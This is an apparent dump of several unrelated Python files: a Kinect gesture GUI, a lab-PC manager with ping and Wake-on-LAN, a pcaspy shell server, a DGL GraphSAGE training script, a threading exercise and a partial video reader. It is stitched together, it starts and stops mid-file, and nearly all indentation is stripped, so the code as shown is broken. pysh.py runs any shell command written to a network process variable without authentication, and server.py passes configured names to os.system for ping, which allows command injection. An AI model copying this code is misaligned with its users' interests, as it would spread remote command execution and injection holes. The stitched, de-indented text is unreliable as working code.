self.directions[props[1]] = 1
if widget_index == 0:
self.directions = [0, 0, 0]
self.setCentralWidget(self.widget)
self.current_widget_number = widget_index
def update_values(self):
for i in range(0, 3):
if self.directions[i] > 0:
if self.volumes[i] < 250:
self.volumes[i] += self.directions[i]
else:
if self.volumes[i] > 0:
self.volumes[i] += self.directions[i]
def update_gui(self):
self.get_hand_data()
if self.hand_data:
if self.current_widget_number in [1,2]:
area = self.hand_data["right"]["hand_area"]
widget = self.centralWidget()
                if (area is not None and self.current_widget_number == 1) or self.current_widget_number == 2:
widget.highlight(area)
if self.current_widget_number == 3:
percent = self.hand_data["right"]["percentage"]
self.widget.percent_to_value(percent)
@pyqtSlot(str, str)
def swipe_detected(self, side, direction):
print(f"{side} Hand: {direction} swipe")
if (side == "left"):
if (direction == "left"):
if self.current_widget_number in [2,3]:
print("returning to last screen")
self.change_frame(self.current_widget_number - 1, self.widget.props[0:-1])
if self.current_widget_number in [4, 1]:
print("returning to main view")
self.change_frame(0)
if (direction == "right"):
if (self.current_widget_number == 0):
self.change_frame(1)
@pyqtSlot(str, str)
def hand_gesture_detected(self, side, gesture):
print(f"{side} Hand: {gesture} detected")
if not self.hand_data:
return
if (side == "right"):
data = self.hand_data[side]
if data["hand_gesture"][0] == "closed":
if not data["hand_gesture"][1] == "closed":
if self.current_widget_number in [1,2]:
area = data["hand_area"]
print(f"selected area {area}")
                        if area is not None:
self.change_frame(self.current_widget_number+1, self.widget.props + [area])
if self.current_widget_number == 3:
self.widget.entered()
def get_hand_data(self):
try:
self.hand_data = hand_data.get_nowait()
except Empty as e:
pass
def kinect_thread_runner(fps, request_status):
    game = kinect.BodyGameRuntime(fps, request_status)
game.swipe_signal.connect(window.swipe_detected)
game.hand_gesture_signal.connect(window.hand_gesture_detected)
while not (game._done or done):
game.run()
if window.current_widget_number == 2:
game.set_disabled_area(window.widget.props[0])
if window.current_widget_number == 1:
game.set_disabled_area(None)
if __name__ == '__main__':
kinect_connected = True
done = False
hand_data = Queue(maxsize=1)
app = QApplication([])
app = global_style.set_style(app)
window = MainWindow()
if kinect_connected:
kinect_thread = threading.Thread(target=kinect_thread_runner, args=(30, hand_data,))
        kinect_thread.daemon = False
kinect_thread.start()
window.resize(1920, 1080)
window.show()
timer_opcua = QtCore.QTimer()
timer_opcua.timeout.connect(window.update)
timer_opcua.start(500)
timer_gui = QtCore.QTimer()
timer_gui.timeout.connect(window.update_gui)
timer_gui.start(35)
app.exec()
done = True
|
server.py
|
from awidom import utils
from awidom.utils import CONFIG
from awidom.utils import Ternary
import os
from platform import system as system_name
import PySide.QtCore as QtCore
from PySide.QtCore import QDir
from PySide.QtCore import QPoint
from PySide.QtCore import QSize
import PySide.QtGui as QtGui
import random
import struct
import socket
import sys
import threading
# Runtime globals
class ICONS(object):
ON = 0
OFF = 0
UNKNOWN = 0
class AWIDom(QtGui.QApplication):
"""Handles the whole program."""
def __init__(self, configfile):
"""
        Construct an AWIDom application.
        Args:
            configfile (str): The path to the configuration file.
"""
super().__init__(sys.argv)
self.loadIcons()
self.loadConfig(configfile)
self.settings = QtCore.QSettings()
self.executions = {}
self.createWindow()
def loadConfig(self, configfile):
config = utils.loadYAML(configfile)
self.setApplicationName(config['app_name'])
self.setOrganizationName(config['organisation'])
self.loadPCs(config['client_file'])
CONFIG.BROADCAST_IP = config['broadcast_ip']
CONFIG.NETWORK_DRIVE = config['root_path']
CONFIG.OTREE_EXEC = config['otree_command']
CONFIG.OTREE_URI = config['otree_uri']
def loadPCs(self, clientfile):
clientsconf = utils.loadYAML(clientfile)
self.left = PCList('Left side', self.execute)
self.right = PCList('Right side', self.execute)
[self.left.append(PC(c['id'], c['name'], c['ip'], c['mac']))
for c in clientsconf['left']]
[self.right.append(PC(c['id'], c['name'], c['ip'], c['mac']))
for c in clientsconf['right']]
def loadIcons(self):
pixmap_on = QtGui.QPixmap('./assets/font_awesome_toggle_on.png')
pixmap_off = QtGui.QPixmap('./assets/font_awesome_toggle_off.png')
pixmap_question = QtGui.QPixmap('./assets/font_awesome_question.png')
ICONS.ON = QtGui.QIcon(pixmap_on)
ICONS.OFF = QtGui.QIcon(pixmap_off)
ICONS.UNKNOWN = QtGui.QIcon(pixmap_question)
def createWindow(self):
"""Creates the window for the application without showing/displaying it.
"""
self.mainwindow = MainWindow()
self.mainwindow.createLayout()
self.mainwindow.pclistswidget.addList(self.left)
self.mainwindow.pclistswidget.addList(self.right)
    def execute(self, clients, commands, wait=False):
'''Adds a command to the execution waiting list.
Args:
clients (list(str)): The list of clients to add the command for.
commands (str, list): The command or list of commands to add
wait (bool, optional): Whether to wait with execution until further
notice.
'''
        if not isinstance(commands, list):
            commands = [commands]
for client in clients:
if client in self.executions:
self.executions[client].extend(commands)
else:
self.executions[client] = commands
if not wait:
self.flushExecutions()
    def flushExecutions(self):
'''Will save all pending executions to the file so they can be run.'''
pass
def run(self):
"""Showing the constructed window to the user."""
self.mainwindow.show()
class PC(QtGui.QCheckBox):
"""Handles one PC in the lab"""
def __init__(self, id, name, ip, mac):
"""Initalizes the PC
Args:
id (int): The id for this PC
name (str): A string as identifier
ip (str): The IPv4-address
mac (str): the MAC-address of this PC
"""
super().__init__('{}: {}'.format(id, name))
self.id = id
self.name = name
self.ip = ip
self.setMac(mac)
self.setOnline(Ternary.UNKNOWN)
self.isPinging = False
def __lt__(self, other):
"""Less then comparison operator
Args:
other (PC): The other PC
Returns:
self.id < other.id
"""
return self.id < other.id
def __repr__(self):
"""Representation of a PC"""
return repr((self.id, self.name, self.ip, self.mac))
def __str__(self):
"""Nice formatted string output for a PC"""
return ('PC: [id: {}, name: {}, ip: {}, mac: {}]'
''.format(self.id, self.name, self.ip, self.mac))
def setMac(self, mac):
if len(mac) == 12:
pass
elif len(mac) == 12 + 5:
sep = mac[2]
mac = mac.replace(sep, '')
else:
raise ValueError('Incorrect MAC address format')
self.mac = mac
def setOnline(self, status):
self.online = Ternary(status)
self.setOnlineIcon()
def setOnlineIcon(self):
if self.online == Ternary.ON:
self.setIcon(ICONS.ON)
elif self.online == Ternary.OFF:
self.setIcon(ICONS.OFF)
else:
self.setIcon(ICONS.UNKNOWN)
self.setIconSize(QtCore.QSize(16, 16))
def _ping(self):
"""Ping this PC"""
self.isPinging = True
self.setOnline(Ternary.UNKNOWN)
if system_name().lower() == 'windows':
ping_param = '-n 1 {} >nul 2>&1'.format(self.name)
else:
ping_param = '-c 1 {}'.format(self.ip)
print('Pinging {}'.format(self.name))
isOnline = os.system('ping {}'.format(ping_param)) == 0
if isOnline:
self.setOnline(Ternary.ON)
else:
self.setOnline(Ternary.OFF)
self.isPinging = False
return isOnline
def ping(self):
if not self.isPinging:
ping_thread = threading.Thread(target=self._ping)
ping_thread.start()
def _wake(self):
# Pad the synchronization stream.
print('Sending magic packet to {}'.format(self.name))
data = ''.join(['FFFFFFFFFFFF', self.mac * 20])
send_data = b''
# Split up the hex values and pack.
for i in range(0, len(data), 2):
send_data = b''.join([send_data,
struct.pack('B', int(data[i: i + 2], 16))])
# Broadcast it to the LAN.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(send_data, (CONFIG.BROADCAST_IP, 7))
return True
def wake(self):
if not self.isChecked():
return True
if self.online != Ternary.ON:
self._wake()
self.setOnline(Ternary.UNKNOWN)
# self.checked = False
else:
utils.sendWarning('{} is already alive.'.format(self.name))
class PCList(QtGui.QGroupBox):
"""A List of Buttons/Models of PCs, used to display as a list."""
def __init__(self, title, executer, pc_list=None):
"""Consturcts a new PCList.
Args:
title (str): The Title for the list, will be shown.
executer (function): The function to add command executions for a
list of client PCs
pc_list (list, optional): The List of PCs added to the object.
"""
super().__init__(title)
self.layout = QtGui.QVBoxLayout()
self.executer = executer
if pc_list is not None:
self.load(pc_list)
def __iter__(self):
return iter(self.children())
def load(self, pc_list):
"""Append all PCs in a list to this PCList.
Args:
pc_list (list): A list of PCs.
"""
return [self.append(pc) for pc in pc_list]
def append(self, pc):
"""Append a single pc to the List:
Args:
pc (PC): The pc.
"""
self.layout.addWidget(pc)
pc.ping()
self.setLayout(self.layout)
def selectAll(self):
return [i.setChecked(True) for i in self if isinstance(i, PC)]
def wake(self):
return [i.wake() for i in self if isinstance(i, PC)]
def execute(self, command, wait=False):
clients = [pc for pc in self if isinstance(pc, PC) and pc.isChecked()]
self.executer(clients, command, wait)
def ping(self):
[i.ping() for i in self if isinstance(i, PC) and i.isChecked()]
class PCListsWidget(QtGui.QWidget):
"""A widget to display multiple PCLists side by side."""
def __init__(self):
"""Construct a new PCListsWidget."""
super().__init__()
self.createLayout()
def __iter__(self):
return iter(self.lists.children())
def createLayout(self):
self.layout = QtGui.QVBoxLayout()
self.listsLayout = QtGui.QHBoxLayout()
self.controlsLayout = QtGui.QHBoxLayout()
self.lists = QtGui.QWidget()
self.controls = QtGui.QWidget()
self.lists.setLayout(self.listsLayout)
self.controls.setLayout(self.controlsLayout)
self.layout.addWidget(self.lists)
self.layout.addWidget(self.controls)
self.setLayout(self.layout)
def addList(self, pclist):
"""Add a new PCList to the widget.
Args:
pclist (PCList): The new list
"""
selectAllButton = QtGui.QPushButton('Select all')
selectAllButton.clicked.connect(pclist.selectAll)
self.listsLayout.addWidget(pclist)
self.controlsLayout.addWidget(selectAllButton)
self.lists.setLayout(self.listsLayout)
self.controls.setLayout(self.controlsLayout)
class MainWindow(QtGui.QMainWindow):
def __init__(self):
"""Construct a new MainWindow"""
super().__init__()
self.PCButtonGroup = QtGui.QButtonGroup()
self.executeable = ('','')
def createLayout(self):
self.cwidget = QtGui.QWidget()
self.clayout = QtGui.QVBoxLayout()
self.setCentralWidget(self.cwidget)
self.pclistswidget = PCListsWidget()
self.clayout.addWidget(self.pclistswidget)
self.clayout.addWidget(self.createControls())
self.cwidget.setLayout(self.clayout)
def createControls(self):
controlwidget = QtGui.QWidget()
controllayout = QtGui.QGridLayout()
controllayout.addWidget(self._button('Ping',
self.ping), 0, 0)
controllayout.addWidget(self._button('Wake up',
self.wake), 0, 1)
controllayout.addWidget(self._button('Shutdown',
self.shutdown), 0, 2)
controllayout.addWidget(self._button('Select executeable',
self.commandSelector), 1, 0)
controllayout.addWidget(self._button('Execute',
self.execute), 1, 1)
controllayout.addWidget(self._button('oTree',
self.startOTree), 1, 2)
controlwidget.setLayout(controllayout)
return controlwidget
def _button(self, name, func):
button = QtGui.QPushButton(name)
button.clicked.connect(func)
return button
def ping(self):
return [i.ping() for i in self.pclistswidget if isinstance(i, PCList)]
def execute(self, executeable=None):
if executeable is None:
executeable = self.executeable
return [i.execute(executeable) for i in self.pclistswidget
if isinstance(i, PCList)]
def wake(self):
return [i.wake() for i in self.pclistswidget if isinstance(i, PCList)]
def shutdown(self):
self.execute('shutdown-command')
def commandSelector(self):
e = QtGui.QFileDialog.getOpenFileName(self, 'Find the executeable',
CONFIG.NETWORK_DRIVE,
'')[0]
if system_name().lower() == 'windows':
e = e.replace('/','\\')
self.executeable = e
def startOTree(self):
utils.sendWarning('Not implemented yet!')
# return [i.execute(self.OTREE_EXEC__) for i in self.pclistswidget
# if isinstance(i, PCList)]
def about(self):
pass
|
pysh.py
|
#!/usr/bin/env python
import time
import sys
import threading
import subprocess
import shlex
from pcaspy import Driver, SimpleServer
prefix = 'MTEST:'
pvdb = {
'COMMAND' : {
'type' : 'char',
'count': 128,
'asyn' : True
},
'OUTPUT' : {
'type' : 'char',
'count': 500,
},
'STATUS' : {
'type' : 'enum',
'enums': ['DONE', 'BUSY']
},
'ERROR' : {
'type' : 'string',
},
}
import math
class myDriver(Driver):
def __init__(self):
Driver.__init__(self)
self.tid = None
def write(self, reason, value):
status = True
# take proper actions
if reason == 'COMMAND':
if not self.tid:
command = value
self.tid = threading.Thread(target=self.runShell,args=(command,))
self.tid.start()
else:
status = False
else:
status = False
# store the values
if status:
self.setParam(reason, value)
return status
def runShell(self, command):
print("DEBUG: Run ", command)
# set status BUSY
self.setParam('STATUS', 1)
self.updatePVs()
# run shell
try:
time.sleep(0.01)
proc = subprocess.Popen(shlex.split(command),
stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
proc.wait()
except OSError:
self.setParam('ERROR', str(sys.exc_info()[1]))
self.setParam('OUTPUT', '')
else:
self.setParam('ERROR', proc.stderr.read().rstrip())
self.setParam('OUTPUT', proc.stdout.read().rstrip())
self.callbackPV('COMMAND')
# set status DONE
self.setParam('STATUS', 0)
self.updatePVs()
self.tid = None
print("DEBUG: Finish ", command)
if __name__ == '__main__':
server = SimpleServer()
server.createPV(prefix, pvdb)
driver = myDriver()
while True:
# process CA transactions
server.process(0.1)
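# Client-side sketch (an assumption for illustration, not part of the original
# script; it presumes pyepics is installed and this IOC is running). Writing a
# shell command to MTEST:COMMAND triggers runShell() in a worker thread, and the
# captured stdout/stderr appear in MTEST:OUTPUT / MTEST:ERROR once STATUS is DONE:
#
#     from epics import caput, caget
#     caput('MTEST:COMMAND', 'ls -l', wait=True)
#     print(caget('MTEST:STATUS', as_string=True))   # 'DONE' after completion
#     print(caget('MTEST:OUTPUT', as_string=True))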
|
train_cv_multi_gpu.py
|
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import dgl.multiprocessing as mp
import dgl.function as fn
import dgl.nn.pytorch as dglnn
import time
import argparse
import tqdm
import traceback
import math
from dgl.data import RedditDataset
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
class SAGEConvWithCV(nn.Module):
def __init__(self, in_feats, out_feats, activation):
super().__init__()
self.W = nn.Linear(in_feats * 2, out_feats)
self.activation = activation
self.reset_parameters()
def reset_parameters(self):
gain = nn.init.calculate_gain('relu')
nn.init.xavier_uniform_(self.W.weight, gain=gain)
nn.init.constant_(self.W.bias, 0)
def forward(self, block, H, HBar=None):
if self.training:
with block.local_scope():
H_src, H_dst = H
HBar_src, agg_HBar_dst = HBar
block.dstdata['agg_hbar'] = agg_HBar_dst
block.srcdata['hdelta'] = H_src - HBar_src
block.update_all(fn.copy_u('hdelta', 'm'), fn.mean('m', 'hdelta_new'))
h_neigh = block.dstdata['agg_hbar'] + block.dstdata['hdelta_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
else:
with block.local_scope():
H_src, H_dst = H
block.srcdata['h'] = H_src
block.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_new'))
h_neigh = block.dstdata['h_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
class SAGE(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation):
super().__init__()
self.n_layers = n_layers
self.n_hidden = n_hidden
self.n_classes = n_classes
self.layers = nn.ModuleList()
self.layers.append(SAGEConvWithCV(in_feats, n_hidden, activation))
for i in range(1, n_layers - 1):
self.layers.append(SAGEConvWithCV(n_hidden, n_hidden, activation))
self.layers.append(SAGEConvWithCV(n_hidden, n_classes, None))
def forward(self, blocks):
h = blocks[0].srcdata['features']
updates = []
for layer, block in zip(self.layers, blocks):
# We need to first copy the representation of nodes on the RHS from the
# appropriate nodes on the LHS.
# Note that the shape of h is (num_nodes_LHS, D) and the shape of h_dst
# would be (num_nodes_RHS, D)
h_dst = h[:block.number_of_dst_nodes()]
hbar_src = block.srcdata['hist']
agg_hbar_dst = block.dstdata['agg_hist']
# Then we compute the updated representation on the RHS.
# The shape of h now becomes (num_nodes_RHS, D)
h = layer(block, (h, h_dst), (hbar_src, agg_hbar_dst))
block.dstdata['h_new'] = h
return h
def inference(self, g, x, batch_size, device):
"""
Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling).
g : the entire graph.
x : the input of entire node set.
        The inference code is written in such a way that it can handle any number of nodes and
        layers.
"""
# During inference with sampling, multi-layer blocks are very inefficient because
# lots of computations in the first few layers are repeated.
# Therefore, we compute the representation of all nodes layer by layer. The nodes
        # on each layer are of course split into batches.
# TODO: can we standardize this?
nodes = th.arange(g.number_of_nodes())
for l, layer in enumerate(self.layers):
y = g.ndata['hist_%d' % (l + 1)]
for start in tqdm.trange(0, len(nodes), batch_size):
end = start + batch_size
batch_nodes = nodes[start:end]
block = dgl.to_block(dgl.in_subgraph(g, batch_nodes), batch_nodes)
induced_nodes = block.srcdata[dgl.NID]
h = x[induced_nodes].to(device)
block = block.to(device)
h_dst = h[:block.number_of_dst_nodes()]
h = layer(block, (h, h_dst))
y[start:end] = h.cpu()
x = y
return y
class NeighborSampler(object):
def __init__(self, g, fanouts):
self.g = g
self.fanouts = fanouts
def sample_blocks(self, seeds):
seeds = th.LongTensor(seeds)
blocks = []
hist_blocks = []
for fanout in self.fanouts:
# For each seed node, sample ``fanout`` neighbors.
frontier = dgl.sampling.sample_neighbors(self.g, seeds, fanout)
# For history aggregation we sample all neighbors.
hist_frontier = dgl.in_subgraph(self.g, seeds)
# Then we compact the frontier into a bipartite graph for message passing.
block = dgl.to_block(frontier, seeds)
hist_block = dgl.to_block(hist_frontier, seeds)
# Obtain the seed nodes for next layer.
seeds = block.srcdata[dgl.NID]
blocks.insert(0, block)
hist_blocks.insert(0, hist_block)
return blocks, hist_blocks
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
def evaluate(model, g, labels, val_mask, batch_size, device):
"""
Evaluate the model on the validation set specified by ``val_mask``.
g : The entire graph.
    labels : The labels of all the nodes.
    val_mask : A 0-1 mask indicating which nodes we actually compute the accuracy for.
batch_size : Number of nodes to compute at the same time.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
inputs = g.ndata['features']
pred = model.inference(g, inputs, batch_size, device) # also recomputes history tensors
model.train()
return compute_acc(pred[val_mask], labels[val_mask])
def load_subtensor(g, labels, blocks, hist_blocks, dev_id, aggregation_on_device=False):
"""
Copys features and labels of a set of nodes onto GPU.
"""
blocks[0].srcdata['features'] = g.ndata['features'][blocks[0].srcdata[dgl.NID]]
blocks[-1].dstdata['label'] = labels[blocks[-1].dstdata[dgl.NID]]
ret_blocks = []
ret_hist_blocks = []
for i, (block, hist_block) in enumerate(zip(blocks, hist_blocks)):
hist_col = 'features' if i == 0 else 'hist_%d' % i
block.srcdata['hist'] = g.ndata[hist_col][block.srcdata[dgl.NID]]
# Aggregate history
hist_block.srcdata['hist'] = g.ndata[hist_col][hist_block.srcdata[dgl.NID]]
if aggregation_on_device:
hist_block = hist_block.to(dev_id)
hist_block.srcdata['hist'] = hist_block.srcdata['hist']
hist_block.update_all(fn.copy_u('hist', 'm'), fn.mean('m', 'agg_hist'))
block = block.to(dev_id)
if not aggregation_on_device:
hist_block = hist_block.to(dev_id)
block.dstdata['agg_hist'] = hist_block.dstdata['agg_hist']
ret_blocks.append(block)
ret_hist_blocks.append(hist_block)
return ret_blocks, ret_hist_blocks
def create_history_storage(g, args, n_classes):
# Initialize history storage
for l in range(args.num_layers):
dim = args.num_hidden if l != args.num_layers - 1 else n_classes
g.ndata['hist_%d' % (l + 1)] = th.zeros(g.number_of_nodes(), dim).share_memory_()
def init_history(g, model, dev_id, batch_size):
with th.no_grad():
model.inference(g, g.ndata['features'], batch_size, dev_id) # replaces hist_i features in-place
def update_history(g, blocks):
with th.no_grad():
for i, block in enumerate(blocks):
ids = block.dstdata[dgl.NID].cpu()
hist_col = 'hist_%d' % (i + 1)
h_new = block.dstdata['h_new'].cpu()
g.ndata[hist_col][ids] = h_new
def run(proc_id, n_gpus, args, devices, data):
dropout = 0.2
dev_id = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
th.cuda.set_device(dev_id)
# Unpack data
train_mask, val_mask, in_feats, labels, n_classes, g = data
train_nid = train_mask.nonzero().squeeze()
val_nid = val_mask.nonzero().squeeze()
# Create sampler
sampler = NeighborSampler(g, [int(_) for _ in args.fan_out.split(',')])
# Create PyTorch DataLoader for constructing blocks
if n_gpus > 1:
dist_sampler = th.utils.data.distributed.DistributedSampler(train_nid.numpy(), shuffle=True, drop_last=False)
dataloader = DataLoader(
dataset=train_nid.numpy(),
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
sampler=dist_sampler,
num_workers=args.num_workers_per_gpu)
else:
dataloader = DataLoader(
dataset=train_nid.numpy(),
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
shuffle=True,
drop_last=False,
num_workers=args.num_workers_per_gpu)
# Define model
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu)
# Move the model to GPU and define optimizer
model = model.to(dev_id)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[dev_id], output_device=dev_id)
loss_fcn = nn.CrossEntropyLoss()
loss_fcn = loss_fcn.to(dev_id)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Compute history tensor and their aggregation before training on CPU
model.eval()
if n_gpus > 1:
if proc_id == 0:
init_history(g, model.module, dev_id, args.val_batch_size)
th.distributed.barrier()
else:
init_history(g, model, dev_id, args.val_batch_size)
model.train()
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
if n_gpus > 1:
dist_sampler.set_epoch(epoch)
tic = time.time()
model.train()
for step, (blocks, hist_blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
            # The input nodes lie on the LHS side of the first block.
            # The output nodes lie on the RHS side of the last block.
seeds = blocks[-1].dstdata[dgl.NID]
blocks, hist_blocks = load_subtensor(g, labels, blocks, hist_blocks, dev_id, True)
# forward
batch_pred = model(blocks)
# update history
update_history(g, blocks)
# compute loss
batch_labels = blocks[-1].dstdata['label']
loss = loss_fcn(batch_pred, batch_labels)
# backward
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f}'.format(
epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:])))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
model.eval()
eval_acc = evaluate(
model if n_gpus == 1 else model.module, g, labels, val_nid, args.val_batch_size, dev_id)
print('Eval Acc {:.4f}'.format(eval_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0')
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='1,1')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--val-batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--num-workers-per-gpu', type=int, default=0)
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
# load reddit data
data = RedditDataset(self_loop=True)
n_classes = data.num_classes
g = data[0]
features = g.ndata['feat']
in_feats = features.shape[1]
labels = g.ndata['label']
train_mask = g.ndata['train_mask']
val_mask = g.ndata['val_mask']
g.ndata['features'] = features.share_memory_()
create_history_storage(g, args, n_classes)
# Create csr/coo/csc formats before launching training processes with multi-gpu.
    # This avoids creating certain formats in each sub-process, which saves memory and CPU.
g.create_formats_()
# Pack data
data = train_mask, val_mask, in_feats, labels, n_classes, g
if n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
|
training_threading.py
|
# Practice exercise for the threading package
import random
import time
import threading
class SolveFactorial:
def __init__(self):
self.answer = 0
def handler_solve_fact_async(self, fact: int):
answer = str(fact) + '! = ' + str(self.solve_fact(fact))
print(answer, end='\n')
def solve_fact(self, fact: int):
factorial: int = fact
if factorial > 0:
if factorial > 1:
                factorial * self.solve_fact(factorial - 1)  # this extra, discarded call is only here to slow the thread down
return factorial * self.solve_fact(factorial - 1)
else:
return 1
else:
return 0
def solve_fact_async(self, fact: int):
factorial = fact
x = threading.Thread(target=self.handler_solve_fact_async, args=(factorial,))
x.start()
return 0
def main():
solver = SolveFactorial()
for i in range(10):
        number = input('\nWhich factorial do you need? ')
try:
solver.solve_fact_async(int(number))
except Exception:
print('error!')
return 1
return 0
if __name__ == '__main__':
main()
|
video_capture.py
|
"""
Ffmpeg-based video file reader with timestamp support and optional GPU decoding
"""
import os
import re
import time
import cv2
from typing import Union, Tuple
import numpy as np
import bisect
import subprocess
import threading
import logging
logger = logging.getLogger()
class YUV2RGB_GPU():
"""
High performance YUV - RGB conversion with Tensorflow
"""
def __init__(self, w=1920, h=1080):
config = tf.ConfigProto(gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.03))
self.y = tf.placeholder(shape=(1, h, w), dtype=tf.float32)
self.u = tf.placeholder(shape=(1, h, w), dtype=tf.float32)
self.v = tf.placeholder(shape=(1, h, w), dtype=tf.float32)
r = self.y + 1.371 * (self.v - 128)
g = self.y + 0.338 * (self.u - 128) - 0.698 * (self.v - 128)
b = self.y + 1.732 * (self.u - 128)
result = tf.stack([b, g, r], axis=-1)
self.result = tf.clip_by_value(result, 0, 255)
self.sess = tf.Session(config=config)
def convert(self, y, u, v):
results = self.sess.run(self.result, feed_dict={self.y: y, self.u: u, self.v: v})
return results.astype(np.uint8)
class VideoCapture:
# how many times to poll for timestamp availability before generating error
MAX_TIMESTAMP_WAIT = 100
TIMESTAMP_POLL_INTERVAL = 0.01
class FrameData:
"""
Object holding pixel data and metadata
"""
def __init__(self, index: int, timestamp: float, frame: np.ndarray):
self.frame = frame
self.index = index
self.timestamp = timestamp
def __init__(self, filename: str, use_gpu=False, video_reader: str = 'opencv'):
"""
@param filename:
@param use_gpu:
@param video_reader: 'ffmpeg_bgr' - read video with ffmpeg bgr24 output, warning: Ffmpeg has some color conversion issue which adds irregular noise to pixel data
'ffmpeg_yuv' - read video with ffmpeg yuv420p output, slower, requires tensorflow
'opencv' - read video with opencv, and use ffmpeg only for reading timestamps, fastest, but scans video 2 times
"""
if not os.path.exists(filename):
raise ValueError(f'File {filename} doesn\'t exist')
if video_reader not in ['ffmpeg_bgr', 'ffmpeg_yuv', 'opencv']:
raise ValueError(f'Unknown video reader type {video_reader}')
logger.info(f'Video reader is: {video_reader}')
        if video_reader == 'ffmpeg_yuv':
            global tf
            import tensorflow as tf
        # the YUV->RGB converter needs width/height, so it is created after _read_metadata() below
        self.pixel_converter = None
self.video_reader = video_reader
self.ts_reader_thread: threading.Thread
self.filename = filename
self.started = False
self.stopping = False
self.timestamps = []
self.frame_idx = -1
self.stream_data_read = False
self.ffmpeg_decoder = ''
self.offset = 0
self.opencv_capture = None
self.last_frame_data = None
if use_gpu:
            # Nvcodec sometimes duplicates frames, producing more frames than are actually in the video. In tests this happened only at the end of the video, but it could potentially corrupt timestamps.
self.ffmpeg_decoder = '-hwaccel nvdec -c:v h264_cuvid'
# this enables GPU codec for Ffmpeg libs used by OpenCV
if 'opencv' in video_reader:
os.environ['OPENCV_FFMPEG_CAPTURE_OPTIONS'] = 'video_codec;h264_cuvid'
logger.warning('For OpenCV+Ffmpeg GPU acceleration to work, config environment variable must be set before the first cv2 import')
if 'opencv' in video_reader:
if not (cv2.getVersionMajor() >= 4 and cv2.getVersionMinor() >= 2):
raise Exception('Can\'t use OpenCV to read video - minimum required version of opencv-python is 4.2')
        self._read_metadata()
        if self.video_reader == 'ffmpeg_yuv':
            self.pixel_converter = YUV2RGB_GPU(self.width, self.height)
def _read_metadata(self):
"""
Reads video properties and fills corresponding fields
@return:
"""
cap = None
try:
cap = cv2.VideoCapture(self.filename, cv2.CAP_FFMPEG)
self.fps = cap.get(cv2.CAP_PROP_FPS)
self.width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.frame_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
if self.video_reader == 'opencv':
self.opencv_capture = cap
logger.info(f'Video file opened {self.filename}, {self.width}x{self.height}, {self.fps} FPS')
finally:
if cap is not None and self.video_reader != 'opencv':
cap.release()
def _read_next_frame(self, grab=False):
if self.video_reader == 'ffmpeg_yuv':
# get raw frame from stdout and convert it to numpy array
bytes = self.video_capture.stdout.read(int(self.height * self.width * 6 // 4))
if len(bytes) == 0:
return None
k = self.height * self.width
y = np.frombuffer(bytes[0:k], dtype=np.uint8).reshape((self.height, self.width))
u = np.frombuffer(bytes[k:k + k // 4], dtype=np.uint8).reshape((self.height // 2, self.width // 2))
v = np.frombuffer(bytes[k + k // 4:], dtype=np.uint8).reshape((self.height // 2, self.width // 2))
u = np.reshape(cv2.resize(np.expand_dims(u, -1), (self.width, self.height)), (self.height, self.width))
v = np.reshape(cv2.resize(np.expand_dims(v, -1), (self.width, self.height)), (self.height, self.width))
return self.pixel_converter.convert([y], [u], [v])[0]
elif self.video_reader == 'ffmpeg_bgr':
